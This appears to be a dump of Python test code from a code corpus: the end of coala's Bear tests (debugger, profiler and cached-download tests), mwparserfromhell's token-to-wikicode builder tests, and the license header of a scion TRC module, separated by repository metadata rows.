self.assertEqual(TestBear.missing_dependencies([TestBear,
BadTestBear]),
set())
def test_check_prerequisites(self):
uut = BearWithPrerequisites(self.settings, self.queue, True)
uut.execute()
self.check_message(LOG_LEVEL.DEBUG)
self.assertTrue(self.queue.empty())
self.assertTrue(uut.was_executed)
self.assertRaisesRegex(RuntimeError,
'The bear BearWithPrerequisites does not '
'fulfill all requirements\\.',
BearWithPrerequisites,
self.settings,
self.queue,
False)
self.check_message(LOG_LEVEL.ERROR,
'The bear BearWithPrerequisites does not fulfill '
'all requirements.')
self.assertTrue(self.queue.empty())
self.assertRaisesRegex(RuntimeError,
'The bear BearWithPrerequisites does not '
'fulfill all requirements\\. Just because '
'I want to\\.',
BearWithPrerequisites,
self.settings,
self.queue,
'Just because I want to.')
self.check_message(LOG_LEVEL.ERROR,
'The bear BearWithPrerequisites does not fulfill '
'all requirements. Just because I want to.')
self.assertTrue(self.queue.empty())
def test_get_non_optional_settings(self):
self.assertEqual(StandAloneBear.get_non_optional_settings(recurse=True),
{'x': ('First value.', int),
'y': ('Second value.', int)})
# Test settings of dependency bears. Also test settings-override-
# behaviour for dependency bears with equal setting names.
self.assertEqual(DependentBear.get_non_optional_settings(recurse=True),
{'x': ('First value.', int),
'y': ('Second value, but better.', int),
'w': ('Fourth value.', float)})
self.assertEqual(DependentBear.get_non_optional_settings(recurse=False),
{'y': ('Second value, but better.', int),
'w': ('Fourth value.', float)})
def test_no_warning_debug_enabled_LocalBear(self):
self.settings.append(Setting('log_level', 'DEBUG'))
self.uut = LocalBear(self.settings, self.queue)
self.uut.execute('filename.py', 'file\n')
self.check_message(LOG_LEVEL.DEBUG, 'Running bear LocalBear...')
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.DEBUG,
'The bear LocalBear raised an exception. If you '
'are the author of this bear, please make sure to '
'catch all exceptions. If not and this error '
'annoys you, you might want to get in contact with '
'the author of this bear.\n\nTraceback information '
'is provided below:', True)
self.assertRaises(NotImplementedError)
def test_no_warning_debug_enabled_GlobalBear(self):
self.settings.append(Setting('log_level', 'DEBUG'))
self.uut = GlobalBear(None, self.settings, self.queue)
self.uut.execute()
self.check_message(LOG_LEVEL.DEBUG, 'Running bear GlobalBear...')
# Fails because of no run() implementation
self.check_message(LOG_LEVEL.DEBUG,
'The bear GlobalBear raised an exception. If you '
'are the author of this bear, please make sure to '
'catch all exceptions. If not and this error '
'annoys you, you might want to get in contact with '
'the author of this bear.\n\nTraceback information '
'is provided below:', True)
self.assertRaises(NotImplementedError)
def test_get_config_dir(self):
section = Section('default')
section.append(Setting('files', '**', '/path/to/dir/config'))
uut = TestBear(section, None)
self.assertEqual(uut.get_config_dir(), abspath('/path/to/dir'))
def test_new_result(self):
bear = Bear(self.settings, None)
result = bear.new_result('test message', '/tmp/testy')
expected = Result.from_values(bear, 'test message', '/tmp/testy')
self.assertEqual(result, expected)
def test_bear_with_default_language(self):
self.uut = BearWithLanguage(self.settings, self.queue)
result = self.uut.execute()[0]
self.assertIsInstance(result, Language)
self.assertEqual(str(result), 'Python 3.4')
self.check_message(LOG_LEVEL.DEBUG)
def test_bear_with_specific_language(self):
self.uut = BearWithLanguage(self.settings, self.queue)
# This should be ignored
self.settings['language'] = 'Java'
# Use this instead
self.settings.language = Language['HTML 5.1']
result = self.uut.execute()[0]
self.assertIsInstance(result, Language)
self.assertEqual(str(result), 'Hypertext Markup Language 5.1')
self.check_message(LOG_LEVEL.DEBUG)
# Mock test added to solve the coverage problem by DebugBearsTest
@patch('pdb.Pdb.do_continue')
def test_custom_continue(self, do_continue):
section = Section('name')
section.append(Setting('debug_bears', 'True'))
bear = Bear(section, self.queue)
args = ()
self.assertEqual(Debugger(bear).do_quit(args), 1)
pdb.Pdb.do_continue.assert_called_once_with(args)
# side_effect effectively implements run() method of bear
@patch('coalib.bears.Bear.Debugger.runcall', side_effect=((1, 2), 1, 2))
def test_debug_run_with_return(self, runcall):
section = Section('name')
section.append(Setting('debug_bears', 'True'))
my_bear = Bear(section, self.queue)
args = ()
kwargs = {}
self.assertEqual(my_bear.run_bear_from_section(args, kwargs), [1, 2])
@patch('coalib.bears.Bear.Debugger.runcall', return_value=None)
def test_debug_run_with_no_return(self, runcall):
section = Section('name')
section.append(Setting('debug_bears', 'True'))
my_bear = Bear(section, self.queue)
args = ()
kwargs = {}
self.assertIsNone(my_bear.run_bear_from_section(args, kwargs))
def test_do_settings(self):
section = Section('name', None)
section.append(Setting('x', '85'))
section.append(Setting('y', 'kbc3'))
section.append(Setting('z', '75'))
bear = TestOneBear(section, self.queue)
output = StringIO()
dbg = Debugger(bear, stdout=output)
arg = ()
self.assertEqual(dbg.do_settings(arg), 1)
output = output.getvalue().splitlines()
self.assertEqual(output[0], 'x = 85')
self.assertEqual(output[1], "y = 'kbc3'")
self.assertEqual(output[2], 'z = 75')
self.assertEqual(output[3], "w = 'kbc'")
with self.assertRaises(ValueError):
Debugger(bear=None)
def test_is_debugged(self):
with self.assertRaises(ValueError):
_is_debugged(bear=None)
section = Section('name')
uut = Bear(section, self.queue)
self.assertEqual(_is_debugged(uut), False)
section.append(Setting('debug_bears', 'tRuE'))
self.assertEqual(_is_debugged(uut), True)
section.append(Setting('debug_bears', '0'))
self.assertEqual(_is_debugged(uut), False)
section.append(Setting('debug_bears', 'Bear, ABear'))
self.assertEqual(_is_debugged(uut), True)
section.append(Setting('debug_bears', 'abc, xyz'))
self.assertEqual(_is_debugged(uut), False)
@patch('cProfile.Profile.dump_stats')
def test_profiler_with_no_directory_exists(self, dump_stats):
args = ()
kwargs = {}
section = Section('name')
section.append(Setting('profile', 'tRuE'))
bear = TestTwoBear(section, self.queue)
self.assertEqual(bear.run_bear_from_section(args, kwargs), [1, 2, 3])
dump_stats.assert_called_once_with(join(os.getcwd(),
'name_TestTwoBear.prof'))
section.append(Setting('profile', 'abc'))
bear = TestTwoBear(section, self.queue)
self.assertEqual(bear.run_bear_from_section(args, kwargs), [1, 2, 3])
dump_stats.assert_called_with(os.path.join(
bear.profile, 'name_TestTwoBear.prof'))
os.rmdir('abc')
section.append(Setting('profile', '1'))
bear = TestThreeBear(section, self.queue)
self.assertIsNone(bear.run_bear_from_section(args, kwargs))
dump_stats.assert_called_with(join(os.getcwd(),
'name_TestThreeBear.prof'))
@patch('cProfile.Profile.dump_stats')
def test_profiler_with_directory_exists(self, dump_stats):
args = ()
kwargs = {}
section = Section('name')
with TemporaryDirectory() as temp_dir:
section.append(Setting('profile', temp_dir))
bear = TestTwoBear(section, self.queue)
self.assertEqual(bear.run_bear_from_section(args, kwargs),
[1, 2, 3])
dump_stats.assert_called_once_with(os.path.join(
bear.profile, 'name_TestTwoBear.prof'))
def test_profiler_with_file_path(self):
args = ()
kwargs = {}
section = Section('name')
with NamedTemporaryFile() as temp_file:
section.append(Setting('profile', temp_file.name))
bear = TestTwoBear(section, self.queue)
with self.assertRaises(SystemExit) as context:
bear.run_bear_from_section(args, kwargs)
self.assertEqual(context.exception.code, 2)
def test_profiler_with_debugger(self):
section = Section('name')
section.append(Setting('debug_bears', 'tRuE'))
section.append(Setting('profile', 'tRuE'))
with self.assertRaisesRegex(
ValueError,
'Cannot run debugger and profiler at the same time.'):
Bear(section, self.queue)
@patch('coalib.bears.Bear.Bear.profile_run')
def test_profiler_with_false_setting(self, profile_run):
args = ()
kwargs = {}
section = Section('name')
section.append(Setting('profile', '0'))
bear = TestThreeBear(section, self.queue)
self.assertIsNone(bear.run_bear_from_section(args, kwargs))
assert not profile_run.called
def test_is_profiled(self):
with self.assertRaisesRegex(
ValueError,
'Positional argument bear is not an instance of Bear class.'):
_is_profiled(bear=None)
section = Section('name')
uut = Bear(section, self.queue)
self.assertEqual(_is_profiled(uut), False)
section.append(Setting('profile', 'tRuE'))
self.assertEqual(_is_profiled(uut), os.getcwd())
section.append(Setting('profile', '0'))
self.assertEqual(_is_profiled(uut), False)
section.append(Setting('profile', 'dirpath'))
self.assertEqual(_is_profiled(uut), 'dirpath')
def test_setting_is_enabled(self):
with self.assertRaisesRegex(
ValueError,
'Positional argument bear is not an instance of Bear class.'):
_setting_is_enabled(bear=None, key='key')
section = Section('name')
uut = Bear(section, self.queue)
with self.assertRaisesRegex(ValueError, 'No setting key passed.'):
_setting_is_enabled(bear=uut, key=None)
self.assertFalse(_setting_is_enabled(bear=uut, key='key'))
section.append(Setting('key', 'value'))
self.assertEqual(_setting_is_enabled(bear=uut, key='key'),
uut.section['key'])
section.append(Setting('key', 'tRuE'))
self.assertEqual(_setting_is_enabled(bear=uut, key='key'), True)
section.append(Setting('key', '0'))
self.assertEqual(_setting_is_enabled(bear=uut, key='key'), False)
def test_profiler_dependency(self, debug=False):
with bear_test_module():
with prepare_file(['#fixme '], None) as (lines, filename):
results = run_coala(console_printer=ConsolePrinter(),
log_printer=LogPrinter(),
arg_list=(
'-c', os.devnull,
'-f', filename,
'-b', 'DependentBear',
'-S', 'use_spaces=yeah',
'--profile', 'profiled_bears',
),
autoapply=False,
debug=debug)
cli_result = results[0]['cli']
self.assertEqual(len(cli_result), 1)
profiled_files = os.listdir('profiled_bears')
self.assertEqual(len(profiled_files), 1)
self.assertEqual(profiled_files[0], 'cli_SpaceConsistencyTestBear.prof')
shutil.rmtree('profiled_bears')
class BrokenReadHTTPResponse(BytesIO):
def __init__(self, chunks, *args, **kwargs):
self.read_count = 0
self.chunks = chunks
def read(self, *args, **kwargs):
# A HTTPResponse will return an empty string when you read from it
# after the socket has been closed.
if self.closed:
return b''
if self.read_count == len(self.chunks):
raise requests.exceptions.ReadTimeout('Fake read timeout')
self.read_count += 1
return self.chunks[self.read_count - 1]
class BearDownloadTest(BearTestBase):
def setUp(self):
super().setUp()
self.mock_url = 'https://test.com'
self.filename = 'test.html'
self.teapot_url = 'https://www.google.com/teapot'
# 'https://httpstat.us/418' and
# http://httpbin.org/status/418 also work
self.file_location = join(self.uut.data_dir, self.filename)
def test_connection_timeout_mocked(self):
exc = requests.exceptions.ConnectTimeout
with requests_mock.Mocker() as reqmock:
reqmock.get(self.mock_url, exc=exc)
with self.assertRaisesRegex(exc, '^$'):
self.uut.download_cached_file(
self.mock_url, self.filename)
def test_read_broken(self):
exc = (
requests.exceptions.RequestException,
)
fake_content = [b'Fake read data', b'Another line']
fake_content_provider = BrokenReadHTTPResponse(fake_content)
self.assertFalse(isfile(self.file_location))
with requests_mock.Mocker() as reqmock:
reqmock.get(self.mock_url, body=fake_content_provider)
with self.assertRaisesRegex(exc, 'Fake read timeout'):
self.uut.download_cached_file(
self.mock_url, self.filename)
self.assertTrue(isfile(self.file_location))
with open(self.file_location, 'rb') as fh:
self.assertEqual(fh.read(), b''.join(fake_content))
def test_status_code_error(self):
exc = requests.exceptions.HTTPError
with self.assertRaisesRegex(exc, '^418 '):
self.uut.download_cached_file(
self.teapot_url, self.filename)
def test_download_cached_file(self):
mock_url = 'https://test.com'
mock_text = """<html>
            <p> lorem ipsum dolor</p>
</html>"""
filename = self.filename
file_location = self.file_location
with freeze_time('2017-01-01') as frozen_datetime:
with requests_mock.Mocker() as reqmock:
reqmock.get(mock_url, text=mock_text)
self.assertFalse(isfile(file_location))
expected_filename = file_location
result_filename = self.uut.download_cached_file(mock_url,
filename)
self.assertTrue(isfile(join(file_location)))
self.assertEqual(result_filename, expected_filename)
expected_time = getmtime(file_location)
frozen_datetime.tick(delta=datetime.timedelta(seconds=0.5))
result_filename = self.uut.download_cached_file(mock_url,
filename)
self.assertEqual(result_filename, expected_filename)
result_time = getmtime(file_location)
self.assertEqual(result_time, expected_time)
| agpl-3.0 | -7,395,492,256,786,567,000 | 38.126394 | 80 | 0.590911 | false |
SunghanKim/mwparserfromhell | tests/test_builder.py | 3 | 21872 | # -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Ben Kurtovic <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from __future__ import unicode_literals
try:
import unittest2 as unittest
except ImportError:
import unittest
from mwparserfromhell.compat import py3k
from mwparserfromhell.nodes import (Argument, Comment, ExternalLink, Heading,
HTMLEntity, Tag, Template, Text, Wikilink)
from mwparserfromhell.nodes.extras import Attribute, Parameter
from mwparserfromhell.parser import tokens, ParserError
from mwparserfromhell.parser.builder import Builder
from ._test_tree_equality import TreeEqualityTestCase, wrap, wraptext
class TestBuilder(TreeEqualityTestCase):
"""Tests for the builder, which turns tokens into Wikicode objects."""
def setUp(self):
self.builder = Builder()
def test_text(self):
"""tests for building Text nodes"""
tests = [
([tokens.Text(text="foobar")], wraptext("foobar")),
([tokens.Text(text="fóóbar")], wraptext("fóóbar")),
([tokens.Text(text="spam"), tokens.Text(text="eggs")],
wraptext("spam", "eggs")),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_template(self):
"""tests for building Template nodes"""
tests = [
([tokens.TemplateOpen(), tokens.Text(text="foobar"),
tokens.TemplateClose()],
wrap([Template(wraptext("foobar"))])),
([tokens.TemplateOpen(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.TemplateClose()],
wrap([Template(wraptext("spam", "eggs"))])),
([tokens.TemplateOpen(), tokens.Text(text="foo"),
tokens.TemplateParamSeparator(), tokens.Text(text="bar"),
tokens.TemplateClose()],
wrap([Template(wraptext("foo"), params=[
Parameter(wraptext("1"), wraptext("bar"), showkey=False)])])),
([tokens.TemplateOpen(), tokens.Text(text="foo"),
tokens.TemplateParamSeparator(), tokens.Text(text="bar"),
tokens.TemplateParamEquals(), tokens.Text(text="baz"),
tokens.TemplateClose()],
wrap([Template(wraptext("foo"), params=[
Parameter(wraptext("bar"), wraptext("baz"))])])),
([tokens.TemplateOpen(), tokens.TemplateParamSeparator(),
tokens.TemplateParamSeparator(), tokens.TemplateParamEquals(),
tokens.TemplateParamSeparator(), tokens.TemplateClose()],
wrap([Template(wrap([]), params=[
Parameter(wraptext("1"), wrap([]), showkey=False),
Parameter(wrap([]), wrap([]), showkey=True),
Parameter(wraptext("2"), wrap([]), showkey=False)])])),
([tokens.TemplateOpen(), tokens.Text(text="foo"),
tokens.TemplateParamSeparator(), tokens.Text(text="bar"),
tokens.TemplateParamEquals(), tokens.Text(text="baz"),
tokens.TemplateParamSeparator(), tokens.Text(text="biz"),
tokens.TemplateParamSeparator(), tokens.Text(text="buzz"),
tokens.TemplateParamSeparator(), tokens.Text(text="3"),
tokens.TemplateParamEquals(), tokens.Text(text="buff"),
tokens.TemplateParamSeparator(), tokens.Text(text="baff"),
tokens.TemplateClose()],
wrap([Template(wraptext("foo"), params=[
Parameter(wraptext("bar"), wraptext("baz")),
Parameter(wraptext("1"), wraptext("biz"), showkey=False),
Parameter(wraptext("2"), wraptext("buzz"), showkey=False),
Parameter(wraptext("3"), wraptext("buff")),
Parameter(wraptext("3"), wraptext("baff"),
showkey=False)])])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_argument(self):
"""tests for building Argument nodes"""
tests = [
([tokens.ArgumentOpen(), tokens.Text(text="foobar"),
tokens.ArgumentClose()],
wrap([Argument(wraptext("foobar"))])),
([tokens.ArgumentOpen(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.ArgumentClose()],
wrap([Argument(wraptext("spam", "eggs"))])),
([tokens.ArgumentOpen(), tokens.Text(text="foo"),
tokens.ArgumentSeparator(), tokens.Text(text="bar"),
tokens.ArgumentClose()],
wrap([Argument(wraptext("foo"), wraptext("bar"))])),
([tokens.ArgumentOpen(), tokens.Text(text="foo"),
tokens.Text(text="bar"), tokens.ArgumentSeparator(),
tokens.Text(text="baz"), tokens.Text(text="biz"),
tokens.ArgumentClose()],
wrap([Argument(wraptext("foo", "bar"), wraptext("baz", "biz"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_wikilink(self):
"""tests for building Wikilink nodes"""
tests = [
([tokens.WikilinkOpen(), tokens.Text(text="foobar"),
tokens.WikilinkClose()],
wrap([Wikilink(wraptext("foobar"))])),
([tokens.WikilinkOpen(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.WikilinkClose()],
wrap([Wikilink(wraptext("spam", "eggs"))])),
([tokens.WikilinkOpen(), tokens.Text(text="foo"),
tokens.WikilinkSeparator(), tokens.Text(text="bar"),
tokens.WikilinkClose()],
wrap([Wikilink(wraptext("foo"), wraptext("bar"))])),
([tokens.WikilinkOpen(), tokens.Text(text="foo"),
tokens.Text(text="bar"), tokens.WikilinkSeparator(),
tokens.Text(text="baz"), tokens.Text(text="biz"),
tokens.WikilinkClose()],
wrap([Wikilink(wraptext("foo", "bar"), wraptext("baz", "biz"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_external_link(self):
"""tests for building ExternalLink nodes"""
tests = [
([tokens.ExternalLinkOpen(brackets=False),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"),
brackets=False)])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"))])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkSeparator(), tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"), wrap([]))])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example.com/"),
tokens.ExternalLinkSeparator(), tokens.Text(text="Example"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example.com/"),
wraptext("Example"))])),
([tokens.ExternalLinkOpen(brackets=False),
tokens.Text(text="http://example"), tokens.Text(text=".com/foo"),
tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example", ".com/foo"),
brackets=False)])),
([tokens.ExternalLinkOpen(brackets=True),
tokens.Text(text="http://example"), tokens.Text(text=".com/foo"),
tokens.ExternalLinkSeparator(), tokens.Text(text="Example"),
tokens.Text(text=" Web Page"), tokens.ExternalLinkClose()],
wrap([ExternalLink(wraptext("http://example", ".com/foo"),
wraptext("Example", " Web Page"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_html_entity(self):
"""tests for building HTMLEntity nodes"""
tests = [
([tokens.HTMLEntityStart(), tokens.Text(text="nbsp"),
tokens.HTMLEntityEnd()],
wrap([HTMLEntity("nbsp", named=True, hexadecimal=False)])),
([tokens.HTMLEntityStart(), tokens.HTMLEntityNumeric(),
tokens.Text(text="107"), tokens.HTMLEntityEnd()],
wrap([HTMLEntity("107", named=False, hexadecimal=False)])),
([tokens.HTMLEntityStart(), tokens.HTMLEntityNumeric(),
tokens.HTMLEntityHex(char="X"), tokens.Text(text="6B"),
tokens.HTMLEntityEnd()],
wrap([HTMLEntity("6B", named=False, hexadecimal=True,
hex_char="X")])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_heading(self):
"""tests for building Heading nodes"""
tests = [
([tokens.HeadingStart(level=2), tokens.Text(text="foobar"),
tokens.HeadingEnd()],
wrap([Heading(wraptext("foobar"), 2)])),
([tokens.HeadingStart(level=4), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.HeadingEnd()],
wrap([Heading(wraptext("spam", "eggs"), 4)])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_comment(self):
"""tests for building Comment nodes"""
tests = [
([tokens.CommentStart(), tokens.Text(text="foobar"),
tokens.CommentEnd()],
wrap([Comment(wraptext("foobar"))])),
([tokens.CommentStart(), tokens.Text(text="spam"),
tokens.Text(text="eggs"), tokens.CommentEnd()],
wrap([Comment(wraptext("spam", "eggs"))])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_tag(self):
"""tests for building Tag nodes"""
tests = [
# <ref></ref>
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagCloseOpen(padding=""), tokens.TagOpenClose(),
tokens.Text(text="ref"), tokens.TagCloseClose()],
wrap([Tag(wraptext("ref"), wrap([]),
closing_tag=wraptext("ref"))])),
# <ref name></ref>
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="name"), tokens.TagCloseOpen(padding=""),
tokens.TagOpenClose(), tokens.Text(text="ref"),
tokens.TagCloseClose()],
wrap([Tag(wraptext("ref"), wrap([]),
attrs=[Attribute(wraptext("name"))])])),
# <ref name="abc" />
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="name"), tokens.TagAttrEquals(),
tokens.TagAttrQuote(char='"'), tokens.Text(text="abc"),
tokens.TagCloseSelfclose(padding=" ")],
wrap([Tag(wraptext("ref"),
attrs=[Attribute(wraptext("name"), wraptext("abc"))],
self_closing=True, padding=" ")])),
# <br/>
([tokens.TagOpenOpen(), tokens.Text(text="br"),
tokens.TagCloseSelfclose(padding="")],
wrap([Tag(wraptext("br"), self_closing=True)])),
# <li>
([tokens.TagOpenOpen(), tokens.Text(text="li"),
tokens.TagCloseSelfclose(padding="", implicit=True)],
wrap([Tag(wraptext("li"), self_closing=True, implicit=True)])),
# </br>
([tokens.TagOpenOpen(invalid=True), tokens.Text(text="br"),
tokens.TagCloseSelfclose(padding="", implicit=True)],
wrap([Tag(wraptext("br"), self_closing=True, invalid=True,
implicit=True)])),
# </br/>
([tokens.TagOpenOpen(invalid=True), tokens.Text(text="br"),
tokens.TagCloseSelfclose(padding="")],
wrap([Tag(wraptext("br"), self_closing=True, invalid=True)])),
# <ref name={{abc}} foo="bar {{baz}}" abc={{de}}f ghi=j{{k}}{{l}}
# mno = '{{p}} [[q]] {{r}}'>[[Source]]</ref>
([tokens.TagOpenOpen(), tokens.Text(text="ref"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="name"), tokens.TagAttrEquals(),
tokens.TemplateOpen(), tokens.Text(text="abc"),
tokens.TemplateClose(),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="foo"), tokens.TagAttrEquals(),
tokens.TagAttrQuote(char='"'), tokens.Text(text="bar "),
tokens.TemplateOpen(), tokens.Text(text="baz"),
tokens.TemplateClose(),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="abc"), tokens.TagAttrEquals(),
tokens.TemplateOpen(), tokens.Text(text="de"),
tokens.TemplateClose(), tokens.Text(text="f"),
tokens.TagAttrStart(pad_first=" ", pad_before_eq="",
pad_after_eq=""),
tokens.Text(text="ghi"), tokens.TagAttrEquals(),
tokens.Text(text="j"), tokens.TemplateOpen(),
tokens.Text(text="k"), tokens.TemplateClose(),
tokens.TemplateOpen(), tokens.Text(text="l"),
tokens.TemplateClose(),
tokens.TagAttrStart(pad_first=" \n ", pad_before_eq=" ",
pad_after_eq=" "),
tokens.Text(text="mno"), tokens.TagAttrEquals(),
tokens.TagAttrQuote(char="'"), tokens.TemplateOpen(),
tokens.Text(text="p"), tokens.TemplateClose(),
tokens.Text(text=" "), tokens.WikilinkOpen(),
tokens.Text(text="q"), tokens.WikilinkClose(),
tokens.Text(text=" "), tokens.TemplateOpen(),
tokens.Text(text="r"), tokens.TemplateClose(),
tokens.TagCloseOpen(padding=""), tokens.WikilinkOpen(),
tokens.Text(text="Source"), tokens.WikilinkClose(),
tokens.TagOpenClose(), tokens.Text(text="ref"),
tokens.TagCloseClose()],
wrap([Tag(wraptext("ref"), wrap([Wikilink(wraptext("Source"))]), [
Attribute(wraptext("name"),
wrap([Template(wraptext("abc"))]), None),
Attribute(wraptext("foo"), wrap([Text("bar "),
Template(wraptext("baz"))]), pad_first=" "),
Attribute(wraptext("abc"), wrap([Template(wraptext("de")),
Text("f")]), None),
Attribute(wraptext("ghi"), wrap([Text("j"),
Template(wraptext("k")),
Template(wraptext("l"))]), None),
Attribute(wraptext("mno"), wrap([Template(wraptext("p")),
Text(" "), Wikilink(wraptext("q")), Text(" "),
Template(wraptext("r"))]), "'", " \n ", " ",
" ")])])),
# "''italic text''"
([tokens.TagOpenOpen(wiki_markup="''"), tokens.Text(text="i"),
tokens.TagCloseOpen(), tokens.Text(text="italic text"),
tokens.TagOpenClose(), tokens.Text(text="i"),
tokens.TagCloseClose()],
wrap([Tag(wraptext("i"), wraptext("italic text"),
wiki_markup="''")])),
# * bullet
([tokens.TagOpenOpen(wiki_markup="*"), tokens.Text(text="li"),
tokens.TagCloseSelfclose(), tokens.Text(text=" bullet")],
wrap([Tag(wraptext("li"), wiki_markup="*", self_closing=True),
Text(" bullet")])),
]
for test, valid in tests:
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_integration(self):
"""a test for building a combination of templates together"""
# {{{{{{{{foo}}bar|baz=biz}}buzz}}usr|{{bin}}}}
test = [tokens.TemplateOpen(), tokens.TemplateOpen(),
tokens.TemplateOpen(), tokens.TemplateOpen(),
tokens.Text(text="foo"), tokens.TemplateClose(),
tokens.Text(text="bar"), tokens.TemplateParamSeparator(),
tokens.Text(text="baz"), tokens.TemplateParamEquals(),
tokens.Text(text="biz"), tokens.TemplateClose(),
tokens.Text(text="buzz"), tokens.TemplateClose(),
tokens.Text(text="usr"), tokens.TemplateParamSeparator(),
tokens.TemplateOpen(), tokens.Text(text="bin"),
tokens.TemplateClose(), tokens.TemplateClose()]
valid = wrap(
[Template(wrap([Template(wrap([Template(wrap([Template(wraptext(
"foo")), Text("bar")]), params=[Parameter(wraptext("baz"),
wraptext("biz"))]), Text("buzz")])), Text("usr")]), params=[
Parameter(wraptext("1"), wrap([Template(wraptext("bin"))]),
showkey=False)])])
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_integration2(self):
"""an even more audacious test for building a horrible wikicode mess"""
# {{a|b|{{c|[[d]]{{{e}}}}}}}[[f|{{{g}}}<!--h-->]]{{i|j= }}
test = [tokens.TemplateOpen(), tokens.Text(text="a"),
tokens.TemplateParamSeparator(), tokens.Text(text="b"),
tokens.TemplateParamSeparator(), tokens.TemplateOpen(),
tokens.Text(text="c"), tokens.TemplateParamSeparator(),
tokens.WikilinkOpen(), tokens.Text(text="d"),
tokens.WikilinkClose(), tokens.ArgumentOpen(),
tokens.Text(text="e"), tokens.ArgumentClose(),
tokens.TemplateClose(), tokens.TemplateClose(),
tokens.WikilinkOpen(), tokens.Text(text="f"),
tokens.WikilinkSeparator(), tokens.ArgumentOpen(),
tokens.Text(text="g"), tokens.ArgumentClose(),
tokens.CommentStart(), tokens.Text(text="h"),
tokens.CommentEnd(), tokens.WikilinkClose(),
tokens.TemplateOpen(), tokens.Text(text="i"),
tokens.TemplateParamSeparator(), tokens.Text(text="j"),
tokens.TemplateParamEquals(), tokens.HTMLEntityStart(),
tokens.Text(text="nbsp"), tokens.HTMLEntityEnd(),
tokens.TemplateClose()]
valid = wrap(
[Template(wraptext("a"), params=[Parameter(wraptext("1"), wraptext(
"b"), showkey=False), Parameter(wraptext("2"), wrap([Template(
wraptext("c"), params=[Parameter(wraptext("1"), wrap([Wikilink(
wraptext("d")), Argument(wraptext("e"))]), showkey=False)])]),
showkey=False)]), Wikilink(wraptext("f"), wrap([Argument(wraptext(
"g")), Comment(wraptext("h"))])), Template(wraptext("i"), params=[
Parameter(wraptext("j"), wrap([HTMLEntity("nbsp",
named=True)]))])])
self.assertWikicodeEqual(valid, self.builder.build(test))
def test_parser_errors(self):
"""test whether ParserError gets thrown for bad input"""
missing_closes = [
[tokens.TemplateOpen(), tokens.TemplateParamSeparator()],
[tokens.TemplateOpen()], [tokens.ArgumentOpen()],
[tokens.WikilinkOpen()], [tokens.ExternalLinkOpen()],
[tokens.HeadingStart()], [tokens.CommentStart()],
[tokens.TagOpenOpen(), tokens.TagAttrStart()],
[tokens.TagOpenOpen()]
]
func = self.assertRaisesRegex if py3k else self.assertRaisesRegexp
msg = r"_handle_token\(\) got unexpected TemplateClose"
func(ParserError, msg, self.builder.build, [tokens.TemplateClose()])
for test in missing_closes:
self.assertRaises(ParserError, self.builder.build, test)
if __name__ == "__main__":
unittest.main(verbosity=2)
| mit | 4,305,054,947,200,492,000 | 48.475113 | 79 | 0.553366 | false |
klausman/scion | python/lib/crypto/trc.py | 1 | 14393 | # Copyright 2014 ETH Zurich
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
